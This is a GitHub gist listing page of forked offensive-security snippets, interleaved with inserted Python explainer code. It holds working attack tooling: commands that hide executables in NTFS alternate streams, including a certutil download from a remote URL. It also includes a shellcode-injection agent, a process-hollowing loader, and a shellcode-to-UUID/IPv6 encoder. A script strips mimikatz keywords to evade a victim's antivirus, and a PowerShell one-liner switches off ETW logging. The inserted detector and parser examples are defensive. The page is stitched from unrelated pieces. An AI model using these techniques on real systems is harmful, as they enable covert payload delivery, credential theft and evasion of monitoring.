
SV1 0xSV1

  • Norway
@0xSV1
0xSV1 / Exe_ADS_Methods.md
Created November 27, 2023 10:59 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams

Add content to ADS

type copies the payload's bytes into a named stream of an existing host file (here a TeamViewer log). The host file's size as shown by a plain dir does not change, because dir reports only the unnamed stream:

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 expands a cab member straight into a stream of file.txt:

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V prints every line that does not contain the search string, so a string that never occurs in the binary makes it copy the whole file into the stream:

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil downloads the URL into a stream named ttt on the directory c:\temp (NTFS directories can carry named streams as well as files):

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab writes its output cab into a stream of cabtest.txt:

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
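The defensive counterpart to the commands above, as an added example that is not part of the gist: every one of them leaves a named $DATA stream that `dir /R` lists on its own line, so a parser for that output is enough to find them. The listing below is constructed to match the files the commands create; the parser, the benign-name list and the extension list are this example's own choices, not anything the gist defines.

```python
import re
from dataclasses import dataclass

# Constructed `dir /R` listing (not captured from a real host). The stream
# lines mirror what the extrac32/makecab commands above leave behind, plus a
# Zone.Identifier stream, which browsers add to every download and is benign.
SAMPLE_DIR_R = """\
 Volume in drive C has no label.
 Directory of C:\\ADS

11/27/2023  10:59 AM    <DIR>          .
11/27/2023  10:59 AM    <DIR>          ..
11/27/2023  10:59 AM            32,768 cabtest.txt
                                 9,912 cabtest.txt:autoruns.cab:$DATA
11/27/2023  10:59 AM               100 file.txt
                             1,234,567 file.txt:procexp.exe:$DATA
11/27/2023  10:59 AM         1,234,567 procexp.exe
                                    26 procexp.exe:Zone.Identifier:$DATA
               3 File(s)      1,267,435 bytes
"""

# `dir /R` prints a named stream as "<size> <file>:<stream>:$DATA" with no
# date column in front of it. The unnamed (default) stream is the ordinary
# file line and is deliberately not matched.
STREAM_LINE = re.compile(r"^\s*([\d,]+)\s+(.+?):([^:\\/]+):\$DATA\s*$")

# Stream names that are expected on workstations and not worth an alert by
# themselves (assumed allow-list for this example).
BENIGN_STREAMS = {"Zone.Identifier"}

# Stream names ending like this deserve a closer look whatever their size.
EXECUTABLE_EXT = (".exe", ".dll", ".cab", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".scr")


@dataclass(frozen=True)
class NamedStream:
    file: str
    stream: str
    size: int

    @property
    def looks_executable(self) -> bool:
        return self.stream.lower().endswith(EXECUTABLE_EXT)


def parse_named_streams(dir_output: str) -> list:
    """Return every named $DATA stream listed in `dir /R` output, in order."""
    found = []
    for line in dir_output.splitlines():
        m = STREAM_LINE.match(line)
        if m:
            size, fname, sname = m.groups()
            found.append(NamedStream(fname, sname, int(size.replace(",", ""))))
    return found


def suspicious_streams(streams: list) -> list:
    """Drop the benign names; everything left is a stream a human should look at."""
    return [s for s in streams if s.stream not in BENIGN_STREAMS]


if __name__ == "__main__":
    for s in suspicious_streams(parse_named_streams(SAMPLE_DIR_R)):
        flag = "EXECUTABLE" if s.looks_executable else "data"
        print(f"{s.file}:{s.stream}  {s.size} bytes  [{flag}]")
```

On a live host the same information comes from PowerShell with `Get-Item -Path C:\ADS\* -Stream *`, which returns one object per stream; feeding its `Stream` and `Length` properties through the same allow-list gives the same result without parsing text.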

0xSV1 / GBC.ps1
Created January 29, 2023 20:45 — forked from LuemmelSec/GBC.ps1
Give Back Control over Windows functions script
$elevated = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
function Show-Menu {
Clear-Host
Write-Host "======================================================"
Write-Host "================ Give Back Control ================"
Write-Host "======================================================"
if($elevated -eq $true){
Write-Host "Local Admin: " -ForegroundColor white -NoNewline; Write-Host $elevated -ForegroundColor Green
Write-Host "We have superpowers. Ready to continue."
0xSV1 / client-ipv6-generic.c
Created January 24, 2022 18:44 — forked from mhaskar/client-ipv6-generic.c
DNSStager v1.0 beta agent that injects the retrieved shellcode into notepad.exe using Early Bird APC
#include <stdint.h>
#include <inttypes.h>
#include <winsock2.h>
#include <windns.h>
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
0xSV1 / Find-VulnerableSchemas.ps1
Created July 30, 2021 14:35 — forked from IISResetMe/Find-VulnerableSchemas.ps1
Find-VulnerableSchemas.ps1
# Dictionary to hold superclass names
$superClass = @{}
# List to hold class names that inherit from container and are allowed to live under computer object
$vulnerableSchemas = [System.Collections.Generic.List[string]]::new()
# Resolve schema naming context
$schemaNC = (Get-ADRootDSE).schemaNamingContext
# Enumerate all class schemas
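The check the script's comments describe, reimplemented in Python over a constructed schema excerpt so the logic can be run and tested offline; this is an added example, not the gist's own code. It assumes each class carries the AD classSchema attributes lDAPDisplayName, subClassOf, possSuperiors and systemPossSuperiors (the last two govern under which parent classes an object may be created), and the contoso* classes are hypothetical. A class that both descends from container and may be created under a computer object matters because anyone who can create children of a computer object can then nest further objects beneath the container they create.

```python
# Constructed excerpt of an AD schema (not pulled from a directory). Only the
# attributes the check needs are present; the contoso* classes are made up.
SAMPLE_SCHEMA = [
    {"lDAPDisplayName": "top", "subClassOf": "top",
     "possSuperiors": [], "systemPossSuperiors": []},
    {"lDAPDisplayName": "container", "subClassOf": "top",
     "possSuperiors": [], "systemPossSuperiors": ["domainDNS", "organizationalUnit", "container"]},
    {"lDAPDisplayName": "person", "subClassOf": "top",
     "possSuperiors": [], "systemPossSuperiors": ["organizationalUnit", "container"]},
    {"lDAPDisplayName": "organizationalPerson", "subClassOf": "person",
     "possSuperiors": [], "systemPossSuperiors": ["organizationalUnit", "container"]},
    {"lDAPDisplayName": "user", "subClassOf": "organizationalPerson",
     "possSuperiors": [], "systemPossSuperiors": ["organizationalUnit", "container"]},
    {"lDAPDisplayName": "computer", "subClassOf": "user",
     "possSuperiors": [], "systemPossSuperiors": ["organizationalUnit", "container"]},
    # Hypothetical: a container subclass that may be created beneath a computer.
    {"lDAPDisplayName": "contosoAppContainer", "subClassOf": "container",
     "possSuperiors": ["computer"], "systemPossSuperiors": ["organizationalUnit"]},
    # Hypothetical: may live under a computer, but is not container-derived.
    {"lDAPDisplayName": "contosoSetting", "subClassOf": "top",
     "possSuperiors": ["computer"], "systemPossSuperiors": []},
    # Hypothetical: container-derived, but cannot be placed directly under a computer.
    {"lDAPDisplayName": "contosoSubContainer", "subClassOf": "contosoAppContainer",
     "possSuperiors": [], "systemPossSuperiors": ["contosoAppContainer"]},
]


def build_superclass_map(schema):
    """lDAPDisplayName -> subClassOf, the dictionary the PowerShell script builds."""
    return {c["lDAPDisplayName"]: c["subClassOf"] for c in schema}


def inherits_from(name, ancestor, superclass):
    """Walk subClassOf upwards. top is its own superclass, so the walk stops
    there; unknown parents and cycles also end it instead of looping."""
    seen = set()
    current = name
    while current in superclass and current not in seen:
        if current == ancestor:
            return True
        seen.add(current)
        current = superclass[current]
    return False


def may_live_under(cls, parent):
    """True if `parent` is an allowed superior of the class (either attribute)."""
    return parent in cls.get("possSuperiors", []) or parent in cls.get("systemPossSuperiors", [])


def find_vulnerable_schemas(schema, container="container", parent="computer"):
    """Classes that inherit from `container` and may be created under `parent`."""
    superclass = build_superclass_map(schema)
    return sorted(
        c["lDAPDisplayName"]
        for c in schema
        if may_live_under(c, parent) and inherits_from(c["lDAPDisplayName"], container, superclass)
    )


if __name__ == "__main__":
    print(find_vulnerable_schemas(SAMPLE_SCHEMA))
```

Against a real forest, SAMPLE_SCHEMA would be replaced by the classSchema objects read from the schema naming context, as the script does with Get-ADRootDSE; the walk and the superior check stay the same.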
0xSV1 / EventLogSearcher.cs
Created March 16, 2021 10:19 — forked from benpturner/EventLogSearcher.cs
Threaded EventLogSearcher for 4624 events
using System;
using System.Collections.Generic;
using System.Diagnostics.Eventing.Reader;
using System.Text.RegularExpressions;
using System.Threading;
namespace EventLogSearcher
{
class Program
{
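What a 4624 search has to do once the events are in hand, shown as an added Python example rather than the gist's C#: parse the Security log's XML shape, pull the fields that matter (TargetUserName, LogonType, IpAddress, WorkstationName), and keep only the logons that are interesting on a domain controller, namely network (type 3) and RemoteInteractive (type 10) logons by non-machine accounts from a remote address. The records are constructed here, the parsing runs on a thread pool because the gist is threaded too (its own split of the work is not visible in the preview), and the filter thresholds are this example's assumptions.

```python
import xml.etree.ElementTree as ET
from concurrent.futures import ThreadPoolExecutor
from dataclasses import dataclass
from typing import Optional

# Namespace every Windows event record carries.
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def _event(user, domain, logon_type, ip, workstation, when):
    """Build one constructed 4624 record in the Security log's XML layout."""
    return f"""<Event xmlns="{NS['e']}">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing"/>
    <EventID>4624</EventID>
    <TimeCreated SystemTime="{when}"/>
    <Computer>DC01.corp.example</Computer>
  </System>
  <EventData>
    <Data Name="TargetUserName">{user}</Data>
    <Data Name="TargetDomainName">{domain}</Data>
    <Data Name="LogonType">{logon_type}</Data>
    <Data Name="IpAddress">{ip}</Data>
    <Data Name="WorkstationName">{workstation}</Data>
  </EventData>
</Event>"""


# Constructed sample records (not exported from a real host).
SAMPLE_EVENTS = [
    _event("alice", "CORP", 2, "-", "WS01", "2021-03-16T10:00:00Z"),                # console logon
    _event("alice", "CORP", 3, "10.0.0.5", "WS01", "2021-03-16T10:05:00Z"),         # network (SMB) logon
    _event("WS02$", "CORP", 3, "10.0.0.6", "WS02", "2021-03-16T10:06:00Z"),         # machine account
    _event("bob", "CORP", 10, "192.168.1.20", "LAPTOP7", "2021-03-16T10:19:00Z"),   # RDP
    _event("svc_backup", "CORP", 5, "-", "-", "2021-03-16T10:20:00Z"),              # service start
]


@dataclass(frozen=True)
class Logon:
    time: str
    user: str
    domain: str
    logon_type: int
    ip: str
    workstation: str


def parse_4624(xml_text: str) -> Optional[Logon]:
    """Turn one event record into a Logon; anything that is not 4624 is skipped."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "4624":
        return None
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return Logon(
        time=root.find("e:System/e:TimeCreated", NS).get("SystemTime"),
        user=data.get("TargetUserName", ""),
        domain=data.get("TargetDomainName", ""),
        logon_type=int(data.get("LogonType", "0")),
        ip=data.get("IpAddress", "-"),
        workstation=data.get("WorkstationName", "-"),
    )


def parse_all(records, workers=4):
    """Parse on a thread pool; pool.map keeps the input order."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return [e for e in pool.map(parse_4624, records) if e is not None]


def remote_user_logons(events, logon_types=(3, 10), local_ips=("-", "127.0.0.1", "::1")):
    """Network and RemoteInteractive logons by human accounts from a remote address.
    Machine accounts end in '$' and are dropped; they log on constantly."""
    return [
        e for e in events
        if e.logon_type in logon_types and e.ip not in local_ips and not e.user.endswith("$")
    ]


if __name__ == "__main__":
    for hit in remote_user_logons(parse_all(SAMPLE_EVENTS)):
        print(f"{hit.time} {hit.domain}\\{hit.user} type={hit.logon_type} from {hit.ip} ({hit.workstation})")
```

Reading the same records from a live log is a matter of swapping SAMPLE_EVENTS for the XML that EventLogReader (or `wevtutil qe Security /q:"*[System[EventID=4624]]"`) returns; the filter does not change.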
0xSV1 / binToUUIDs.py
Created March 12, 2021 14:34 — forked from rvrsh3ll/binToUUIDs.py
Convert shellcode file to UUIDs
from uuid import UUID
import os
import sys
# Usage: python3 binToUUIDs.py shellcode.bin [--print]
print("""
____ _ _______ _ _ _ _ _____ _____
| _ \(_) |__ __| | | | | | | |_ _| __ \
| |_) |_ _ __ | | ___ | | | | | | | | | | | | |___
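The encoding both the binToUUIDs gist and the DNSStager IPv6 agent above rely on, as an added example that is not either project's code: the payload is cut into 16-byte chunks, and each chunk is written out as a UUID string (for a loader that calls UuidFromStringA into an executable buffer) or as an IPv6 address (for a stager that receives it as AAAA records). The UUID form uses Python's bytes_le so that the struct UuidFromStringA produces has the same byte order in memory as the original chunk. The padding byte and the IPv6 layout are assumptions of this example; DNSStager's own wire format is not shown on this page, and the sample blob is arbitrary bytes, not shellcode.

```python
import ipaddress
from uuid import UUID

CHUNK = 16
# Assumption: the tail is padded with 0x90 so the last chunk is still 16 bytes.
PAD = b"\x90"


def pad_to_chunk(data: bytes) -> bytes:
    """Pad to a multiple of 16 bytes; the decoder cannot know the original length."""
    rem = len(data) % CHUNK
    return data + PAD * (CHUNK - rem) if rem else data


def bin_to_uuids(data: bytes) -> list:
    """Each 16-byte chunk becomes a UUID string. bytes_le means the first four
    bytes land in Data1 as a little-endian DWORD (and so on), which is exactly
    the layout UuidFromStringA writes back, so the buffer ends up byte-identical."""
    data = pad_to_chunk(data)
    return [str(UUID(bytes_le=data[i:i + CHUNK])) for i in range(0, len(data), CHUNK)]


def uuids_to_bin(uuids) -> bytes:
    """Inverse of bin_to_uuids, including any padding."""
    return b"".join(UUID(u).bytes_le for u in uuids)


def bin_to_ipv6(data: bytes) -> list:
    """Each 16-byte chunk becomes one IPv6 address; the bytes map straight onto
    the 128-bit address in network order, so no byte swapping is involved."""
    data = pad_to_chunk(data)
    return [str(ipaddress.IPv6Address(data[i:i + CHUNK])) for i in range(0, len(data), CHUNK)]


def ipv6_to_bin(addrs) -> bytes:
    """Inverse of bin_to_ipv6; .packed returns the 16 raw bytes."""
    return b"".join(ipaddress.IPv6Address(a).packed for a in addrs)


# Constructed stand-in for shellcode.bin: 37 arbitrary bytes, so the last chunk is short.
SAMPLE_BLOB = bytes(range(37))


if __name__ == "__main__":
    for u in bin_to_uuids(SAMPLE_BLOB):
        print(u)
    for a in bin_to_ipv6(SAMPLE_BLOB):
        print(a)
```

The round trip is the check worth keeping in a build script: decode what you emitted and compare it to the input before the strings go anywhere near a loader, because a chunk in the wrong byte order runs as garbage rather than failing loudly.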
0xSV1 / process-hollowing.cs
Created March 12, 2021 12:06 — forked from med0x2e/process-hollowing.cs
Process Hollowing (slightly updated to work with G2JS) - credits for the initial code go to @smgorelik and @ambray
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;
namespace Hollowing
{
public class Loader
{
public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe");
0xSV1 / MITRE_Attack_WindowsAppControl.csv
Created February 10, 2021 12:39 — forked from mgraeber-rc/MITRE_Attack_WindowsAppControl.csv
Windows-specific MITRE ATT&CK techniques application control prevention assessment. This is a first attempt to assess the extent to which application control solutions would mitigate/prevent attack techniques. Note: this highly subjective assessment assumes a system that enforces an application control solution that at a minimum allows all Windo…
ID,Name,MitigatedByAppControl,Notes
T1001,Data Obfuscation,Not Applicable,Relevant sub-techniques addressed below
T1001.001,Junk Data,No,Technique is not necessarily related to the execution of arbitrary code on an endpoint.
T1001.002,Steganography,Limited,"If custom attacker code were necessary to perform this technique, it would be prevented."
T1001.003,Protocol Impersonation,Limited,"If custom attacker code were necessary to perform this technique, it would be prevented."
T1003,OS Credential Dumping,Not Applicable,Relevant sub-techniques addressed below
T1003.001,LSASS Memory,Limited,Built-in utilities exist to perform this technique. They would have to be explicitly blocked.
T1003.002,Security Account Manager,Limited,Built-in utilities exist to perform this technique. They would have to be explicitly blocked.
T1003.003,NTDS,Limited,Built-in utilities exist to perform this technique. They would have to be explicitly blocked.
T1003.004,LSA Secrets,Limited,Built-in utilities exist to perform this technique.
0xSV1 / mimikatz_obfuscator.sh
Created January 25, 2021 17:42 — forked from S3cur3Th1sSh1t/mimikatz_obfuscator.sh
Mimikatz Obfuscator
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/candycrush
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)